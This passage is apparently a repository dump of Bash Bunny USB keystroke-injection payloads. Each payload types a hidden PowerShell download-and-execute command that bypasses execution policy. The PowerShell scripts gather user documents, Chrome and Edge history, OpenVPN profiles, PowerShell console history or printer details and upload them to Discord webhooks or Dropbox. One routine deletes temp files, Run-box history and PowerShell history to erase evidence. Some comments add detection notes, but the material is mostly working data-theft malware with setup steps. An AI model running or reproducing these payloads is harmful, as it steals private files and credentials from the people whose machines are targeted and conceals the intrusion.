'username' = $env:username
'content' = $text
}
# Text message: only sent when $text is non-empty
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
# File upload: only attempted when $file is non-empty
if (-not ([string]::IsNullOrEmpty($file))) {
curl.exe -F "file1=@$file" $hookurl
}
}
# Recursively list files under $env:HOMEPATH whose names match the listed document and image extensions.
# Analyst note: this is a bulk read of the user's home tree followed by archive creation in
# %TEMP%; the archive names come from the table below (Word.zip, PowerPoint.zip, Excel.zip,
# PDF.zip, JPEG.zip, PNG.zip, CSV.zip, Text.zip) and are usable as file-name indicators.
$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
# Wildcard pattern -> label used for the archive name and the upload message.
# Several patterns share a label ("Word", "JPEG"), so they map to the same archive path.
$types = @{
"*.docx" = "Word";
"*.doc" = "Word";
"*.pptx" = "PowerPoint";
"*.xlsx" = "Excel";
"*.pdf" = "PDF";
"*.jpeg" = "JPEG";
"*.png" = "PNG";
"*.jpg" = "JPEG";
"*.csv" = "CSV";
"*.txt" = "Text";
}
# One pass per pattern: select matching files, zip them into %TEMP%, upload the archive
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object {$_.Name -like $type}
# Skip patterns with no matching files
if ($filteredFiles) {
$zipFile = "$env:TEMP\$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
================================================
FILE: BashBunny/payloads/Doc-Hog/payload.txt
================================================
REM Title: Doc-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
REM Analyst summary: keystroke injection that opens the Run dialog and types a hidden
REM PowerShell download-and-execute line (iwr into $pl, then iex $pl), so the script body
REM is not written to disk by this step.
REM Detection points: powershell.exe with -w h -NoP -NonI -ep Bypass and both iwr and iex
REM on the command line; PowerShell script block logging (event ID 4104) records the
REM script that iex runs. The placeholder URL below is plain http.
DEFINE URL http://new-url.com/powershell.ps1
REM Target: Windows 10
QUACK DELAY 2000
REM Open the Run dialog (Win+R)
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
QUACK ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Doc-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Doc-Hog
A payload to exfiltrate files such as PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV
## Description
This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/History-Pig/HP.ps1
================================================
# History-Pig: copies the current user's Chrome and Edge "History" files into the temp
# directory under a name built from the user name and a timestamp.
# Analyst note: the staged copies are named <USERNAME>-<yyyy-MM-dd_hh-mm>_chrome_history and
# <USERNAME>-<yyyy-MM-dd_hh-mm>_edge_history in %TEMP%; the "hh" format is a 12-hour clock
# with no AM/PM marker, so the name alone does not fix the time of day.
# Existence probe for the Chrome History file; the boolean is written to output and not stored
Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf
# If the Chrome History file does not exist, report it on the host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Chrome History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise stage a copy of the Chrome History file in the temp directory for upload
else {
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1"
}
# Existence probe for the Edge History file; the boolean is written to output and not stored
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf
# If the Edge History file does not exist, report it on the host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) {
try {
Write-Host "The Edge History file has not been found. "
}
catch {
throw $_.Exception.Message
}
}
# Otherwise stage a copy of the Edge History file in the temp directory for upload
else {
$F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history"
Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2"
}
function DropBox-Upload {
# Sends one local file to Dropbox with a single POST to the /2/files/upload endpoint,
# authenticated by the bearer token hard-coded below.
#   SourceFilePath (alias -f): local file to send; mandatory, may come from the pipeline.
# The Invoke-RestMethod result is emitted to the caller; nothing here catches a failed request.
# Detection: outbound HTTPS from powershell.exe to content.dropboxapi.com carrying a file body
# is the network-visible step of this script.
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token
# Remote name is the leaf of the local path, placed directly under "/".
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# Dropbox-API-Arg JSON: mode "add" with autorename, so an existing remote file is kept and the new one is renamed.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is the raw request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Upload the two staged copies from the temp directory ($F1 = Chrome, $F2 = Edge).
DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"
# Shows a Wscript.Shell popup reading "Driver Updated" that closes after 1 second;
# the text is unrelated to anything this script does.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: BashBunny/payloads/History-Pig/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&amp;center=true&amp;size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# History-Pig
A payload to exfiltrate the history of the 2 most popular browsers
## Description
This payload will enumerate through the browser directories, looking for the file that stores the history
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/History-Pig/payload.txt
================================================
REM Title: History-Pig
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate browsers history to a dropbox
REM Target: Windows 10, 11
REM Flow: wait 2 s, open the Run dialog (GUI r), wait 0.5 s, type the PowerShell one-liner, press ENTER.
REM The one-liner starts PowerShell with a hidden window (-w h), no profile (-NoP), non-interactive (-NonI)
REM and execution policy Bypass (-ep Bypass); it fetches a script with iwr and executes the response with iex.
REM Detection: a command typed into the Run dialog is recorded under the user's RunMRU registry key, and the
REM powershell.exe command line (hidden window, Bypass, iwr followed by iex) is visible where process
REM command-line logging is enabled.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/OVPN-Hog/o.ps1
================================================
function OVPN-Hog {
# Posts a text message and/or a file to the webhook URL held in $hookurl.
#   file: optional path of a file, sent as multipart form field "file1" through curl.exe.
#   text: optional message, sent as JSON together with the current user name.
# Each step is skipped when its argument is null or empty.
# Detection: powershell.exe and curl.exe posting to the same webhook URL in quick succession,
# the second request carrying a file.
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
# Placeholder for the destination webhook URL.
$hookurl = 'DISCORD-WEBHOOK'
# JSON body: the sender name is the local user name, the content is the caller's text.
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))) {
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)
}
if (-not ([string]::IsNullOrEmpty($file))) {
# File upload goes through the external curl.exe binary, not through PowerShell.
curl.exe -F "file1=@$file" $hookurl
}
}
# Collects *.ovpn files found recursively under the path "C:", zips them into the temp directory
# and hands the archive to OVPN-Hog for upload.
# Artifact: OpenVPN.zip under $env:TEMP.
# Response note: OpenVPN profiles can embed private keys and credentials, so profiles present on an
# affected host should be treated as exposed and reissued.
$Drive = "C:"
$Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse
if ($Files) {
# Map of file-name pattern -> label; the label becomes the archive name and part of the message text.
$types = @{
"*.ovpn" = "OpenVPN"
}
foreach ($type in $types.Keys) {
$filteredFiles = $Files | Where-Object { $_.Name -like $type }
if ($filteredFiles) {
$zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip"
$filteredFiles | Compress-Archive -DestinationPath $zipFile
OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files"
}
}
}
================================================
FILE: BashBunny/payloads/OVPN-Hog/payload.txt
================================================
REM Title: OVPN-Hog
REM Author: atomiczsec
REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook.
REM Target: Windows 10
REM Flow: wait 2 s, open the Run dialog (GUI r), wait 0.5 s, type the PowerShell one-liner, press ENTER.
REM The one-liner starts PowerShell with a hidden window (-w h), no profile (-NoP), non-interactive (-NonI)
REM and execution policy Bypass (-ep Bypass); it fetches a script with iwr and executes the response with iex.
REM Detection: a command typed into the Run dialog is recorded under the user's RunMRU registry key, and the
REM powershell.exe command line (hidden window, Bypass, iwr followed by iex) is visible where process
REM command-line logging is enabled.
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 500
QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl
QUACK ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/OVPN-Hog/readme.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈&amp;center=true&amp;size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#Getting-Started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# OVPN-Hog
A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).
## Description
This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div align="center">
<a href="https://lnk.bio/atomiczsec">
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
</a>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Powershell-History/PH.ps1
================================================
#Powershell-History
# Stages a copy of the current user's PSReadLine console history in the temp directory
# so the upload call later in the script can send it.
# Artifact: <USERNAME>-<yyyy-MM-dd_hh-mm>_ps_history.txt under $env:tmp.
# Response note: console history can contain credentials typed on the command line; treat any
# found there as exposed when this artifact turns up.
# Existence check; the boolean result goes to the pipeline and is not used below.
Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf
#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) {
try {
Write-Host "The Powershell History file has not been found. "
}
catch {
# Re-throws only the message text of whatever Write-Host raised.
throw $_.Exception.Message
}
}
# Copy Powershell History to Temp Directory to get sent to Dropbox
else {
# $F1 is assigned only on this branch, i.e. only when the history file exists.
$F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt"
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1"
}
function DropBox-Upload {
# Sends one local file to Dropbox with a single POST to the /2/files/upload endpoint,
# authenticated by the bearer token hard-coded below.
#   SourceFilePath (alias -f): local file to send; mandatory, may come from the pipeline.
# The Invoke-RestMethod result is emitted to the caller; nothing here catches a failed request.
# Detection: outbound HTTPS from powershell.exe to content.dropboxapi.com carrying a file body
# is the network-visible step of this script.
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token
# Remote name is the leaf of the local path, placed directly under "/".
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# Dropbox-API-Arg JSON: mode "add" with autorename, so an existing remote file is kept and the new one is renamed.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is the raw request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
# Upload the staged history copy from the temp directory.
DropBox-Upload -f "$env:tmp/$F1"
# Shows a Wscript.Shell popup reading "Driver Updated" that closes after 1 second;
# the text is unrelated to anything this script does.
$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)
================================================
FILE: BashBunny/payloads/Powershell-History/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈&amp;center=true&amp;size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Powershell-History
A payload to exfiltrate the history of the powershell console
## Description
This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console
These files will be saved to the temp directory
Finally dropbox will be used to exfiltrate the files to cloud storage
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Powershell-History/payload.txt
================================================
REM Title: Powershell-History
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Target: Windows 10
REM Flow: wait 2 s, open the Run dialog (GUI r), wait 0.5 s, type the PowerShell one-liner, press ENTER.
REM The one-liner starts PowerShell with a hidden window (-w h), no profile (-NoP), non-interactive (-NonI)
REM and execution policy Bypass (-ep Bypass); it fetches a script with iwr and executes the response with iex.
REM Detection: a command typed into the Run dialog is recorded under the user's RunMRU registry key, and the
REM powershell.exe command line (hidden window, Bypass, iwr followed by iex) is visible where process
REM command-line logging is enabled.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Printer-Recon/PR.ps1
================================================
function DropBox-Upload {
# Sends one local file to Dropbox with a single POST to the /2/files/upload endpoint,
# authenticated by the bearer token hard-coded below.
#   SourceFilePath (alias -f): local file to send; mandatory, may come from the pipeline.
# The Invoke-RestMethod result is emitted to the caller; nothing here catches a failed request.
# Detection: outbound HTTPS from powershell.exe to content.dropboxapi.com carrying a file body
# is the network-visible step of this script.
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
# Remote name is the leaf of the local path, placed directly under "/".
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
# Dropbox-API-Arg JSON: mode "add" with autorename, so an existing remote file is kept and the new one is renamed.
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
# The file content is the raw request body (-InFile).
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
function Clean-Exfil {
# Deletes traces of the run from the current user's profile. Takes no parameters.
# Every step removes data an investigator would otherwise rely on; the deletions themselves
# (a RunMRU key with no values, a missing PSReadLine history file, an emptied temp folder)
# are indicators worth alerting on.
# empty temp folder
# Removes everything under the temp directory, not only the files this script created; errors are suppressed.
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# delete run box history
# /va removes every value under the key, /f suppresses the confirmation prompt.
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
# Removes the file PSReadLine reports as its history save path.
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
# Writes the installed printers (name, type, driver name, shared flag, location) to a text file
# in the temp directory, uploads that file, then runs the cleanup routine.
# Artifact (until cleanup): <USERNAME>-<yyyy-MM-dd_hh-mm>_PrinterDriver.txt under $env:tmp.
$F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt"
Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1
DropBox-Upload -f $F1
Clean-Exfil
================================================
FILE: BashBunny/payloads/Printer-Recon/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈&amp;center=true&amp;size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Printer-Recon
## Description
This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. It can also be used to find printer web interfaces on the network.
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
================================================
FILE: BashBunny/payloads/Printer-Recon/payload.txt
================================================
REM Title: Printer-Recon
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver exploitation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
REM Flow: wait 2 s, open the Run dialog (GUI r), wait 0.5 s, type the PowerShell one-liner, press ENTER.
REM The one-liner starts PowerShell with a hidden window (-w h), no profile (-NoP), non-interactive (-NonI)
REM and execution policy Bypass (-ep Bypass); it fetches a script with iwr and executes the response with iex.
REM Detection: a command typed into the Run dialog is recorded under the user's RunMRU registry key, and the
REM powershell.exe command line (hidden window, Bypass, iwr followed by iex) is visible where process
REM command-line logging is enabled.
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
================================================
FILE: BashBunny/payloads/Priv-Paths/README.md
================================================
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Priv+Paths!+😈&amp;center=true&amp;size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Priv-Paths
## Description
A payload to enumerate unquoted service paths for privilege escalation and send them to a Discord webhook.
## Getting Started
